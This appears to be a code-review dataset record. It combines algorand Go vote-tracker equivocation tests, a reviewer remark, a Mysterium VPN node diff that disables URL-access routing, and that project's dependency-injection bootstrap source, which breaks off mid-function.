expectedOutputs[i] = thresholdEvent{T: none} case i == V2Bound: // simple duplicate rv := inputVotes[i-1].(voteAcceptedEvent).Vote.R inputVotes[i] = voteFilterRequestEvent{RawVote: rv} require.EqualValuesf(t, equivVal2, rv.Proposal, "test case is malformed, filtering incorrect vote") expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} case i == V2Bound+1: // make sure first equivocation is not filtered voteTwo := helper.MakeValidVoteAcceptedVal(t, V2Bound-1, next, equivVal1) inputVotes[i] = voteFilterRequestEvent{RawVote: voteTwo.Vote.R} expectedOutputs[i] = emptyEvent{} case i < V1V2Bound: // now, add some equivocations inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i-V2Bound, next, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} case i == V1V2Bound: voteThree := helper.MakeValidVoteAcceptedVal(t, 2, next, equivVal3) inputVotes[i] = voteFilterRequestEvent{RawVote: voteThree.Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } } testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker filtered first equivocation") } func TestVoteTrackerFiltersFutureEquivocations(t *testing.T) { helper := voteMakerHelper{} helper.Setup() const Num = 100 inputVotes := make([]event, Num) expectedOutputs := make([]event, Num) for i := 0; i < int(Num); i++ { switch { case i == 0: Val := proposalValue{BlockDigest: randomBlockHash()} inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) expectedOutputs[i] = thresholdEvent{T: none} case i == 1: // first equivocation should not be filtered Val := proposalValue{BlockDigest: randomBlockHash()} VA := helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) inputVotes[i] = voteFilterRequestEvent{RawVote: VA.Vote.R} expectedOutputs[i] = emptyEvent{} case i == 2: // add an equivocation Val := proposalValue{BlockDigest: randomBlockHash()} inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) expectedOutputs[i] = thresholdEvent{T: none} case i < Num: // future equivocations should be filtered Val := proposalValue{BlockDigest: randomBlockHash()} VA := helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) inputVotes[i] = voteFilterRequestEvent{RawVote: VA.Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } } testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not filter equivocations") } /* Check that machine panics on unknown event */ func TestVoteTrackerRejectsUnknownEvent(t *testing.T) { testCase := determisticTraceTestCase{ inputs: []event{ emptyEvent{}, }, expectedOutputs: []event{}, } voteTrackerAutomata := &ioAutomataConcrete{ listener: &voteTracker{}, // we also want the base machine to panic, so don't wrap in contract } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not reject unknown event") }
1
35,523
We could avoid passing proto since threshold isn't needed.
algorand-go-algorand
go
@@ -1040,7 +1040,10 @@ func (di *Dependencies) AllowURLAccess(servers ...string) error { return err } - if config.GetBool(config.FlagKeepConnectedOnFail) { + // Doesn't work as expected because some services share IP address with + // each other and with location oracle which is supposed to be routed + // through VPN tunnel. + if false && config.GetBool(config.FlagKeepConnectedOnFail) { if err := router.AllowURLAccess(servers...); err != nil { return err }
1
/* * Copyright (C) 2018 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package cmd import ( "fmt" "net" "net/http" "net/url" "path/filepath" "reflect" "time" "github.com/ethereum/go-ethereum/accounts/keystore" "github.com/ethereum/go-ethereum/common" "github.com/pkg/errors" "github.com/rs/zerolog/log" "github.com/mysteriumnetwork/node/communication/nats" "github.com/mysteriumnetwork/node/config" appconfig "github.com/mysteriumnetwork/node/config" "github.com/mysteriumnetwork/node/consumer/bandwidth" consumer_session "github.com/mysteriumnetwork/node/consumer/session" "github.com/mysteriumnetwork/node/core/auth" "github.com/mysteriumnetwork/node/core/beneficiary" "github.com/mysteriumnetwork/node/core/connection" "github.com/mysteriumnetwork/node/core/connection/connectionstate" "github.com/mysteriumnetwork/node/core/discovery" "github.com/mysteriumnetwork/node/core/discovery/proposal" "github.com/mysteriumnetwork/node/core/ip" "github.com/mysteriumnetwork/node/core/location" "github.com/mysteriumnetwork/node/core/node" nodevent "github.com/mysteriumnetwork/node/core/node/event" "github.com/mysteriumnetwork/node/core/payout" "github.com/mysteriumnetwork/node/core/policy" "github.com/mysteriumnetwork/node/core/port" "github.com/mysteriumnetwork/node/core/quality" "github.com/mysteriumnetwork/node/core/service" "github.com/mysteriumnetwork/node/core/state" "github.com/mysteriumnetwork/node/core/storage/boltdb" "github.com/mysteriumnetwork/node/core/storage/boltdb/migrations/history" "github.com/mysteriumnetwork/node/core/storage/boltdb/migrator" "github.com/mysteriumnetwork/node/eventbus" "github.com/mysteriumnetwork/node/feedback" "github.com/mysteriumnetwork/node/firewall" "github.com/mysteriumnetwork/node/identity" "github.com/mysteriumnetwork/node/identity/registry" identity_registry "github.com/mysteriumnetwork/node/identity/registry" identity_selector "github.com/mysteriumnetwork/node/identity/selector" "github.com/mysteriumnetwork/node/logconfig" "github.com/mysteriumnetwork/node/market/mysterium" "github.com/mysteriumnetwork/node/metadata" "github.com/mysteriumnetwork/node/mmn" "github.com/mysteriumnetwork/node/nat" natprobe "github.com/mysteriumnetwork/node/nat/behavior" "github.com/mysteriumnetwork/node/nat/event" "github.com/mysteriumnetwork/node/nat/mapping" "github.com/mysteriumnetwork/node/nat/upnp" "github.com/mysteriumnetwork/node/p2p" "github.com/mysteriumnetwork/node/pilvytis" "github.com/mysteriumnetwork/node/requests" "github.com/mysteriumnetwork/node/router" service_noop "github.com/mysteriumnetwork/node/services/noop" service_openvpn "github.com/mysteriumnetwork/node/services/openvpn" "github.com/mysteriumnetwork/node/session/connectivity" "github.com/mysteriumnetwork/node/session/pingpong" "github.com/mysteriumnetwork/node/sleep" "github.com/mysteriumnetwork/node/tequilapi" "github.com/mysteriumnetwork/node/utils/netutil" "github.com/mysteriumnetwork/payments/client" paymentClient "github.com/mysteriumnetwork/payments/client" psort "github.com/mysteriumnetwork/payments/client/sort" ) // UIServer represents our web server type UIServer interface { Serve() Stop() } // Dependencies is DI container for top level components which is reused in several places type Dependencies struct { Node *Node HTTPTransport *http.Transport HTTPClient *requests.HTTPClient NetworkDefinition metadata.NetworkDefinition MysteriumAPI *mysterium.MysteriumAPI PricingHelper *pingpong.Pricer EtherClientL1 *paymentClient.EthMultiClient EtherClientL2 *paymentClient.EthMultiClient SorterClientL1 *psort.MultiClientSorter SorterClientL2 *psort.MultiClientSorter EtherClients []*paymentClient.ReconnectableEthClient BrokerConnector *nats.BrokerConnector BrokerConnection nats.Connection NATService nat.NATService NATProber natprobe.NATProber Storage *boltdb.Bolt Keystore *identity.Keystore IdentityManager identity.Manager SignerFactory identity.SignerFactory IdentityRegistry identity_registry.IdentityRegistry IdentitySelector identity_selector.Handler IdentityMover *identity.Mover DiscoveryFactory service.DiscoveryFactory ProposalRepository *discovery.PricedServiceProposalRepository FilterPresetStorage *proposal.FilterPresetStorage DiscoveryWorker discovery.Worker QualityClient *quality.MysteriumMORQA IPResolver ip.Resolver LocationResolver *location.Cache PolicyOracle *policy.Oracle SessionStorage *consumer_session.Storage SessionConnectivityStatusStorage connectivity.StatusStorage EventBus eventbus.EventBus ConnectionManager connection.Manager ConnectionRegistry *connection.Registry ServicesManager *service.Manager ServiceRegistry *service.Registry ServiceSessions *service.SessionPool ServiceFirewall firewall.IncomingTrafficFirewall PortPool *port.Pool PortMapper mapping.PortMapper StateKeeper *state.Keeper P2PDialer p2p.Dialer P2PListener p2p.Listener Authenticator *auth.Authenticator JWTAuthenticator *auth.JWTAuthenticator UIServer UIServer Transactor *registry.Transactor BCHelper *paymentClient.MultichainBlockchainClient ProviderRegistrar *registry.ProviderRegistrar LogCollector *logconfig.Collector Reporter *feedback.Reporter BeneficiarySaver beneficiary.Saver BeneficiaryProvider beneficiary.Provider ProviderInvoiceStorage *pingpong.ProviderInvoiceStorage ConsumerTotalsStorage *pingpong.ConsumerTotalsStorage HermesPromiseStorage *pingpong.HermesPromiseStorage ConsumerBalanceTracker *pingpong.ConsumerBalanceTracker HermesChannelRepository *pingpong.HermesChannelRepository HermesPromiseSettler pingpong.HermesPromiseSettler HermesURLGetter *pingpong.HermesURLGetter HermesCaller *pingpong.HermesCaller HermesPromiseHandler *pingpong.HermesPromiseHandler SettlementHistoryStorage *pingpong.SettlementHistoryStorage AddressProvider *pingpong.AddressProvider HermesStatusChecker *pingpong.HermesStatusChecker MMN *mmn.MMN PilvytisAPI *pilvytis.API Pilvytis *pilvytis.Service ResidentCountry *identity.ResidentCountry PayoutAddressStorage *payout.AddressStorage NATStatusV2Keeper *nat.StatusTrackerV2 } // Bootstrap initiates all container dependencies func (di *Dependencies) Bootstrap(nodeOptions node.Options) error { logconfig.Configure(&nodeOptions.LogOptions) netutil.LogNetworkStats() p2p.RegisterContactUnserializer() log.Info().Msg("Starting Mysterium Node " + metadata.VersionAsString()) // Check early for presence of an already running node tequilaListener, err := di.createTequilaListener(nodeOptions) if err != nil { return err } if err := nodeOptions.Directories.Check(); err != nil { return err } if err := di.bootstrapFirewall(nodeOptions.Firewall); err != nil { return err } di.bootstrapEventBus() di.bootstrapAddressProvider(nodeOptions) if err := di.bootstrapStorage(nodeOptions.Directories.Storage); err != nil { return err } netutil.ClearStaleRoutes() if err := di.bootstrapNetworkComponents(nodeOptions); err != nil { return err } if err := di.bootstrapLocationComponents(nodeOptions); err != nil { return err } if err := di.bootstrapResidentCountry(); err != nil { return err } if err := di.bootstrapIdentityComponents(nodeOptions); err != nil { return err } if err := di.bootstrapDiscoveryComponents(nodeOptions.Discovery); err != nil { return err } if err := di.bootstrapAuthenticator(); err != nil { return err } di.bootstrapUIServer(nodeOptions) if err := di.bootstrapMMN(); err != nil { return err } portRange, err := getUDPListenPorts() if err != nil { return err } di.PortPool = port.NewFixedRangePool(portRange) di.bootstrapP2P() di.SessionConnectivityStatusStorage = connectivity.NewStatusStorage() if err := di.bootstrapServices(nodeOptions); err != nil { return err } if err := di.bootstrapQualityComponents(nodeOptions.Quality); err != nil { return err } if err := di.bootstrapNodeComponents(nodeOptions, tequilaListener); err != nil { return err } di.registerConnections(nodeOptions) if err = di.handleConnStateChange(); err != nil { return err } if err := di.Node.Start(); err != nil { return err } appconfig.Current.EnableEventPublishing(di.EventBus) di.handleNATStatusForPublicIP() log.Info().Msg("Mysterium node started!") return nil } func (di *Dependencies) bootstrapAddressProvider(nodeOptions node.Options) { ch1 := nodeOptions.Chains.Chain1 ch2 := nodeOptions.Chains.Chain2 addresses := map[int64]client.SmartContractAddresses{ ch1.ChainID: { Registry: common.HexToAddress(ch1.RegistryAddress), Myst: common.HexToAddress(ch1.MystAddress), Hermes: common.HexToAddress(ch1.HermesID), ChannelImplementation: common.HexToAddress(ch1.ChannelImplAddress), }, ch2.ChainID: { Registry: common.HexToAddress(ch2.RegistryAddress), Myst: common.HexToAddress(ch2.MystAddress), Hermes: common.HexToAddress(ch2.HermesID), ChannelImplementation: common.HexToAddress(ch2.ChannelImplAddress), }, } keeper := client.NewMultiChainAddressKeeper(addresses) di.AddressProvider = pingpong.NewAddressProvider(keeper, common.HexToAddress(nodeOptions.Transactor.Identity)) } func (di *Dependencies) bootstrapP2P() { verifierFactory := func(id identity.Identity) identity.Verifier { return identity.NewVerifierIdentity(id) } di.P2PListener = p2p.NewListener(di.BrokerConnection, di.SignerFactory, identity.NewVerifierSigned(), di.IPResolver, di.EventBus) di.P2PDialer = p2p.NewDialer(di.BrokerConnector, di.SignerFactory, verifierFactory, di.IPResolver, di.PortPool, di.EventBus) } func (di *Dependencies) createTequilaListener(nodeOptions node.Options) (net.Listener, error) { if !nodeOptions.TequilapiEnabled { return tequilapi.NewNoopListener() } tequilaListener, err := net.Listen("tcp", fmt.Sprintf("%s:%d", nodeOptions.TequilapiAddress, nodeOptions.TequilapiPort)) if err != nil { return nil, errors.Wrap(err, fmt.Sprintf("the port %v seems to be taken. Either you're already running a node or it is already used by another application", nodeOptions.TequilapiPort)) } return tequilaListener, nil } func (di *Dependencies) bootstrapStateKeeper(options node.Options) error { deps := state.KeeperDeps{ NATStatusProvider: nat.NewStatusTracker("unknown"), Publisher: di.EventBus, ServiceLister: di.ServicesManager, IdentityProvider: di.IdentityManager, IdentityRegistry: di.IdentityRegistry, IdentityChannelCalculator: di.AddressProvider, BalanceProvider: di.ConsumerBalanceTracker, EarningsProvider: di.HermesChannelRepository, ChainID: options.ChainID, ProposalPricer: di.ProposalRepository, } di.StateKeeper = state.NewKeeper(deps, state.DefaultDebounceDuration) return di.StateKeeper.Subscribe(di.EventBus) } func (di *Dependencies) registerOpenvpnConnection(nodeOptions node.Options) { service_openvpn.Bootstrap() connectionFactory := func() (connection.Connection, error) { return service_openvpn.NewClient( // TODO instead of passing binary path here, Openvpn from node options could represent abstract vpn factory itself nodeOptions.Openvpn.BinaryPath(), nodeOptions.Directories.Script, nodeOptions.Directories.Runtime, di.SignerFactory, di.IPResolver, ) } di.ConnectionRegistry.Register(service_openvpn.ServiceType, connectionFactory) } func (di *Dependencies) registerNoopConnection() { service_noop.Bootstrap() di.ConnectionRegistry.Register(service_noop.ServiceType, service_noop.NewConnection) } // Shutdown stops container func (di *Dependencies) Shutdown() (err error) { var errs []error defer func() { for i := range errs { log.Error().Err(errs[i]).Msg("Dependencies shutdown failed") if err == nil { err = errs[i] } } }() // Kill node first which includes current active VPN connection cleanup. if di.Node != nil { if err := di.Node.Kill(); err != nil { errs = append(errs, err) } } if di.ServicesManager != nil { if err := di.ServicesManager.Kill(); err != nil { errs = append(errs, err) } } if di.PolicyOracle != nil { di.PolicyOracle.Stop() } if di.NATService != nil { if err := di.NATService.Disable(); err != nil { errs = append(errs, err) } } if di.EtherClientL1 != nil { di.EtherClientL1.Close() } if di.SorterClientL1 != nil { di.SorterClientL1.Stop() } if di.EtherClientL2 != nil { di.EtherClientL2.Close() } if di.SorterClientL2 != nil { di.SorterClientL2.Stop() } if di.DiscoveryWorker != nil { di.DiscoveryWorker.Stop() } if di.Pilvytis != nil { di.Pilvytis.Stop() } if di.BrokerConnection != nil { di.BrokerConnection.Close() } if di.QualityClient != nil { di.QualityClient.Stop() } if di.ServiceFirewall != nil { di.ServiceFirewall.Teardown() } firewall.Reset() if di.Storage != nil { if err := di.Storage.Close(); err != nil { errs = append(errs, err) } } return nil } func (di *Dependencies) bootstrapStorage(path string) error { localStorage, err := boltdb.NewStorage(path) if err != nil { return err } migrator := migrator.NewMigrator(localStorage) err = migrator.RunMigrations(history.Sequence) if err != nil { return err } di.Storage = localStorage if !config.GetBool(config.FlagUserMode) { netutil.SetRouteManagerStorage(di.Storage) } invoiceStorage := pingpong.NewInvoiceStorage(di.Storage) di.ProviderInvoiceStorage = pingpong.NewProviderInvoiceStorage(invoiceStorage) di.ConsumerTotalsStorage = pingpong.NewConsumerTotalsStorage(di.Storage, di.EventBus) di.HermesPromiseStorage = pingpong.NewHermesPromiseStorage(di.Storage) di.SessionStorage = consumer_session.NewSessionStorage(di.Storage) di.SettlementHistoryStorage = pingpong.NewSettlementHistoryStorage(di.Storage) return di.SessionStorage.Subscribe(di.EventBus) } func (di *Dependencies) getHermesURL(nodeOptions node.Options) (string, error) { log.Info().Msgf("node chain id %v", nodeOptions.ChainID) if nodeOptions.ChainID == nodeOptions.Chains.Chain1.ChainID { return di.HermesURLGetter.GetHermesURL(nodeOptions.ChainID, common.HexToAddress(nodeOptions.Chains.Chain1.HermesID)) } return di.HermesURLGetter.GetHermesURL(nodeOptions.ChainID, common.HexToAddress(nodeOptions.Chains.Chain2.HermesID)) } func (di *Dependencies) bootstrapNodeComponents(nodeOptions node.Options, tequilaListener net.Listener) error { // Consumer current session bandwidth bandwidthTracker := bandwidth.NewTracker(di.EventBus) if err := bandwidthTracker.Subscribe(di.EventBus); err != nil { return err } di.bootstrapBeneficiarySaver(nodeOptions) di.bootstrapBeneficiaryProvider(nodeOptions) di.PayoutAddressStorage = payout.NewAddressStorage(di.Storage, di.MMN) if err := di.bootstrapProviderRegistrar(nodeOptions); err != nil { return err } di.ConsumerBalanceTracker = pingpong.NewConsumerBalanceTracker( di.EventBus, di.BCHelper, di.ConsumerTotalsStorage, di.HermesCaller, di.Transactor, di.IdentityRegistry, di.AddressProvider, pingpong.ConsumerBalanceTrackerConfig{ FastSync: pingpong.PollConfig{ Interval: nodeOptions.Payments.BalanceFastPollInterval, Timeout: nodeOptions.Payments.BalanceFastPollTimeout, }, LongSync: pingpong.PollConfig{ Interval: nodeOptions.Payments.BalanceLongPollInterval, }, }, ) err := di.ConsumerBalanceTracker.Subscribe(di.EventBus) if err != nil { return errors.Wrap(err, "could not subscribe consumer balance tracker to relevant events") } di.HermesPromiseHandler = pingpong.NewHermesPromiseHandler(pingpong.HermesPromiseHandlerDeps{ HermesPromiseStorage: di.HermesPromiseStorage, HermesCallerFactory: func(hermesURL string) pingpong.HermesHTTPRequester { return pingpong.NewHermesCaller(di.HTTPClient, hermesURL) }, HermesURLGetter: di.HermesURLGetter, FeeProvider: di.Transactor, Encryption: di.Keystore, EventBus: di.EventBus, }) if err := di.HermesPromiseHandler.Subscribe(di.EventBus); err != nil { return err } if err := di.bootstrapHermesPromiseSettler(nodeOptions); err != nil { return err } di.ConnectionRegistry = connection.NewRegistry() di.ConnectionManager = connection.NewManager( pingpong.ExchangeFactoryFunc( di.Keystore, di.SignerFactory, di.ConsumerTotalsStorage, di.AddressProvider, di.EventBus, nodeOptions.Payments.ConsumerDataLeewayMegabytes, ), di.ConnectionRegistry.CreateConnection, di.EventBus, di.IPResolver, di.LocationResolver, connection.DefaultConfig(), connection.DefaultStatsReportInterval, connection.NewValidator( di.ConsumerBalanceTracker, di.IdentityManager, ), di.P2PDialer, ) di.NATProber = natprobe.NewNATProber(di.ConnectionManager, di.EventBus) di.LogCollector = logconfig.NewCollector(&logconfig.CurrentLogOptions) reporter, err := feedback.NewReporter(di.LogCollector, di.IdentityManager, nodeOptions.FeedbackURL) if err != nil { return err } di.Reporter = reporter if err := di.bootstrapStateKeeper(nodeOptions); err != nil { return err } di.bootstrapPilvytis(nodeOptions) tequilapiHTTPServer, err := di.bootstrapTequilapi(nodeOptions, tequilaListener) if err != nil { return err } sleepNotifier := sleep.NewNotifier(di.ConnectionManager, di.EventBus) sleepNotifier.Subscribe() di.Node = NewNode(di.ConnectionManager, tequilapiHTTPServer, di.EventBus, di.UIServer, sleepNotifier) sessionProviderFunc := func(providerID string) (results []nat.Session) { for _, session := range di.QualityClient.ProviderSessions(providerID) { results = append(results, nat.Session{ProviderID: session.ProposalID.ProviderID, MonitoringFailed: session.MonitoringFailed, ServiceType: session.ProposalID.ServiceType}) } return results } di.NATStatusV2Keeper = nat.NewStatusTrackerV2( sessionProviderFunc, di.IdentityManager, di.EventBus, nodeOptions.NATStatusTrackerV2, ) return nil } // function decides on network definition combined from testnet3/localnet flags and possible overrides func (di *Dependencies) bootstrapNetworkComponents(options node.Options) (err error) { optionsNetwork := options.OptionsNetwork network := metadata.DefaultNetwork switch { case optionsNetwork.Testnet3: network = metadata.Testnet3Definition case optionsNetwork.Localnet: network = metadata.LocalnetDefinition } // override defined values one by one from options if optionsNetwork.MysteriumAPIAddress != metadata.DefaultNetwork.MysteriumAPIAddress { network.MysteriumAPIAddress = optionsNetwork.MysteriumAPIAddress } if !reflect.DeepEqual(optionsNetwork.BrokerAddresses, metadata.DefaultNetwork.BrokerAddresses) { network.BrokerAddresses = optionsNetwork.BrokerAddresses } if fmt.Sprint(optionsNetwork.EtherClientRPCL1) != fmt.Sprint(metadata.DefaultNetwork.Chain1.EtherClientRPC) { network.Chain1.EtherClientRPC = optionsNetwork.EtherClientRPCL1 } if fmt.Sprint(optionsNetwork.EtherClientRPCL2) != fmt.Sprint(metadata.DefaultNetwork.Chain2.EtherClientRPC) { network.Chain2.EtherClientRPC = optionsNetwork.EtherClientRPCL2 } di.NetworkDefinition = network dnsMap := optionsNetwork.DNSMap for host, hostIPs := range network.DNSMap { dnsMap[host] = append(dnsMap[host], hostIPs...) } for host, hostIPs := range dnsMap { log.Info().Msgf("Using local DNS: %s -> %s", host, hostIPs) } resolver := requests.NewResolverMap(dnsMap) dialer := requests.NewDialerSwarm(options.BindAddress, options.SwarmDialerDNSHeadstart) dialer.ResolveContext = resolver di.HTTPTransport = requests.NewTransport(dialer.DialContext) di.HTTPClient = requests.NewHTTPClientWithTransport(di.HTTPTransport, requests.DefaultTimeout) di.MysteriumAPI = mysterium.NewClient(di.HTTPClient, network.MysteriumAPIAddress) di.PricingHelper = pingpong.NewPricer(di.MysteriumAPI) err = di.PricingHelper.Subscribe(di.EventBus) if err != nil { return err } brokerURLs := make([]*url.URL, len(di.NetworkDefinition.BrokerAddresses)) for i, brokerAddress := range di.NetworkDefinition.BrokerAddresses { brokerURL, err := nats.ParseServerURL(brokerAddress) if err != nil { return err } brokerURLs[i] = brokerURL } di.BrokerConnector = nats.NewBrokerConnector(dialer.DialContext, resolver) if di.BrokerConnection, err = di.BrokerConnector.Connect(brokerURLs...); err != nil { return err } log.Info().Msgf("Using L1 Eth endpoints: %v", network.Chain1.EtherClientRPC) log.Info().Msgf("Using L2 Eth endpoints: %v", network.Chain2.EtherClientRPC) di.EtherClients = make([]*paymentClient.ReconnectableEthClient, 0) bcClientsL1 := make([]paymentClient.AddressableEthClientGetter, 0) for _, rpc := range network.Chain1.EtherClientRPC { client, err := paymentClient.NewReconnectableEthClient(rpc, time.Second*30) if err != nil { log.Warn().Msgf("failed to load rpc endpoint: %s", rpc) continue } di.EtherClients = append(di.EtherClients, client) bcClientsL1 = append(bcClientsL1, client) } if len(bcClientsL1) == 0 { return errors.New("no l1 rpc endpoints loaded, can't continue") } bcClientsL2 := make([]paymentClient.AddressableEthClientGetter, 0) for _, rpc := range network.Chain2.EtherClientRPC { client, err := paymentClient.NewReconnectableEthClient(rpc, time.Second*30) if err != nil { log.Warn().Msgf("failed to load rpc endpoint: %s", rpc) continue } di.EtherClients = append(di.EtherClients, client) bcClientsL2 = append(bcClientsL2, client) } if len(bcClientsL2) == 0 { return errors.New("no l2 rpc endpoints loaded, can't continue") } notifyChannelL1 := make(chan paymentClient.Notification, 5) di.EtherClientL1, err = paymentClient.NewEthMultiClientNotifyDown(time.Second*20, bcClientsL1, notifyChannelL1) if err != nil { return err } di.SorterClientL1 = psort.NewMultiClientSorterNoTicker(di.EtherClientL1, notifyChannelL1) di.SorterClientL1.AddOnNotificationAction(psort.DefaultByAvailability) go di.SorterClientL1.Run() notifyChannelL2 := make(chan paymentClient.Notification, 5) di.EtherClientL2, err = paymentClient.NewEthMultiClientNotifyDown(time.Second*20, bcClientsL2, notifyChannelL2) if err != nil { return err } di.SorterClientL2 = psort.NewMultiClientSorterNoTicker(di.EtherClientL2, notifyChannelL2) di.SorterClientL2.AddOnNotificationAction(psort.DefaultByAvailability) go di.SorterClientL2.Run() bcL1 := paymentClient.NewBlockchain(di.EtherClientL1, options.Payments.BCTimeout) bcL2 := paymentClient.NewBlockchain(di.EtherClientL2, options.Payments.BCTimeout) clients := make(map[int64]paymentClient.BC) clients[options.Chains.Chain1.ChainID] = bcL1 clients[options.Chains.Chain2.ChainID] = bcL2 di.BCHelper = paymentClient.NewMultichainBlockchainClient(clients) di.HermesURLGetter = pingpong.NewHermesURLGetter(di.BCHelper, di.AddressProvider) registryStorage := registry.NewRegistrationStatusStorage(di.Storage) hermesURL, err := di.getHermesURL(options) if err != nil { return err } di.HermesCaller = pingpong.NewHermesCaller(di.HTTPClient, hermesURL) di.SignerFactory = func(id identity.Identity) identity.Signer { return identity.NewSigner(di.Keystore, id) } di.Transactor = registry.NewTransactor( di.HTTPClient, options.Transactor.TransactorEndpointAddress, di.AddressProvider, di.SignerFactory, di.EventBus, di.BCHelper, ) registryCfg := registry.IdentityRegistryConfig{ TransactorPollInterval: options.Payments.RegistryTransactorPollInterval, TransactorPollTimeout: options.Payments.RegistryTransactorPollTimeout, } if di.IdentityRegistry, err = identity_registry.NewIdentityRegistryContract(di.EtherClientL2, di.AddressProvider, registryStorage, di.EventBus, di.HermesCaller, di.Transactor, registryCfg); err != nil { return err } allow := []string{ network.MysteriumAPIAddress, options.Transactor.TransactorEndpointAddress, hermesURL, options.PilvytisAddress, } allow = append(allow, network.Chain1.EtherClientRPC...) allow = append(allow, network.Chain2.EtherClientRPC...) if err := di.AllowURLAccess(allow...); err != nil { return err } return di.IdentityRegistry.Subscribe(di.EventBus) } func (di *Dependencies) bootstrapEventBus() { di.EventBus = eventbus.New() } func (di *Dependencies) bootstrapIdentityComponents(options node.Options) error { var ks *keystore.KeyStore if options.Keystore.UseLightweight { log.Debug().Msg("Using lightweight keystore") ks = keystore.NewKeyStore(options.Directories.Keystore, keystore.LightScryptN, keystore.LightScryptP) } else { log.Debug().Msg("Using heavyweight keystore") ks = keystore.NewKeyStore(options.Directories.Keystore, keystore.StandardScryptN, keystore.StandardScryptP) } di.Keystore = identity.NewKeystoreFilesystem(options.Directories.Keystore, ks) if di.ResidentCountry == nil { return errMissingDependency("di.residentCountry") } di.IdentityManager = identity.NewIdentityManager(di.Keystore, di.EventBus, di.ResidentCountry) di.IdentitySelector = identity_selector.NewHandler( di.IdentityManager, identity.NewIdentityCache(options.Directories.Keystore, "remember.json"), di.SignerFactory, ) di.IdentityMover = identity.NewMover( di.Keystore, di.EventBus, di.SignerFactory) return nil } func (di *Dependencies) bootstrapQualityComponents(options node.OptionsQuality) (err error) { if err := di.AllowURLAccess(options.Address); err != nil { return err } di.QualityClient = quality.NewMorqaClient( requests.NewHTTPClientWithTransport(di.HTTPTransport, 10*time.Second), options.Address, di.SignerFactory, ) go di.QualityClient.Start() var transport quality.Transport switch options.Type { case node.QualityTypeElastic: transport = quality.NewElasticSearchTransport(di.HTTPClient, options.Address, 10*time.Second) case node.QualityTypeMORQA: transport = quality.NewMORQATransport(di.QualityClient, di.LocationResolver) case node.QualityTypeNone: transport = quality.NewNoopTransport() default: err = errors.Errorf("unknown Quality Oracle provider: %s", options.Type) } if err != nil { return err } // Quality metrics qualitySender := quality.NewSender(transport, metadata.VersionAsString()) if err := qualitySender.Subscribe(di.EventBus); err != nil { return err } // warm up the loader as the load takes up to a couple of secs loader := &upnp.GatewayLoader{} go loader.Get() natSender := event.NewSender(qualitySender, di.IPResolver.GetPublicIP, loader.HumanReadable) if err := natSender.Subscribe(di.EventBus); err != nil { return err } return nil } func (di *Dependencies) bootstrapLocationComponents(options node.Options) (err error) { if err = di.AllowURLAccess(options.Location.IPDetectorURL); err != nil { return errors.Wrap(err, "failed to add firewall exception") } ipResolver := ip.NewResolver(di.HTTPClient, options.BindAddress, options.Location.IPDetectorURL, ip.IPFallbackAddresses) di.IPResolver = ip.NewCachedResolver(ipResolver, 5*time.Minute) var resolver location.Resolver switch options.Location.Type { case node.LocationTypeManual: resolver = location.NewStaticResolver(options.Location.Country, options.Location.City, options.Location.IPType, di.IPResolver) case node.LocationTypeBuiltin: resolver, err = location.NewBuiltInResolver(di.IPResolver) case node.LocationTypeMMDB: resolver, err = location.NewExternalDBResolver(filepath.Join(options.Directories.Script, options.Location.Address), di.IPResolver) case node.LocationTypeOracle: if err := di.AllowURLAccess(options.Location.Address); err != nil { return err } resolver, err = location.NewOracleResolver(di.HTTPClient, options.Location.Address), nil default: err = errors.Errorf("unknown location provider: %s", options.Location.Type) } if err != nil { return err } di.LocationResolver = location.NewCache(resolver, di.EventBus, time.Minute*5) err = di.EventBus.SubscribeAsync(connectionstate.AppTopicConnectionState, di.LocationResolver.HandleConnectionEvent) if err != nil { return err } err = di.EventBus.SubscribeAsync(nodevent.AppTopicNode, di.LocationResolver.HandleNodeEvent) if err != nil { return err } return nil } func (di *Dependencies) bootstrapAuthenticator() error { key, err := auth.NewJWTEncryptionKey(di.Storage) if err != nil { return err } di.Authenticator = auth.NewAuthenticator() di.JWTAuthenticator = auth.NewJWTAuthenticator(key) return nil } func (di *Dependencies) bootstrapPilvytis(options node.Options) { di.PilvytisAPI = pilvytis.NewAPI(di.HTTPClient, options.PilvytisAddress, di.SignerFactory, di.LocationResolver, di.AddressProvider) statusTracker := pilvytis.NewStatusTracker(di.PilvytisAPI, di.IdentityManager, di.EventBus, 30*time.Second) di.Pilvytis = pilvytis.NewService(di.PilvytisAPI, di.IdentityManager, statusTracker) di.Pilvytis.Start() } func (di *Dependencies) bootstrapFirewall(options node.OptionsFirewall) error { firewall.DefaultOutgoingFirewall = firewall.NewOutgoingTrafficFirewall(config.GetBool(config.FlagOutgoingFirewall)) if err := firewall.DefaultOutgoingFirewall.Setup(); err != nil { return err } di.ServiceFirewall = firewall.NewIncomingTrafficFirewall(config.GetBool(config.FlagIncomingFirewall)) if err := di.ServiceFirewall.Setup(); err != nil { return err } if options.BlockAlways { bindAddress := "0.0.0.0" resolver := ip.NewResolver(di.HTTPClient, bindAddress, "", ip.IPFallbackAddresses) outboundIP, err := 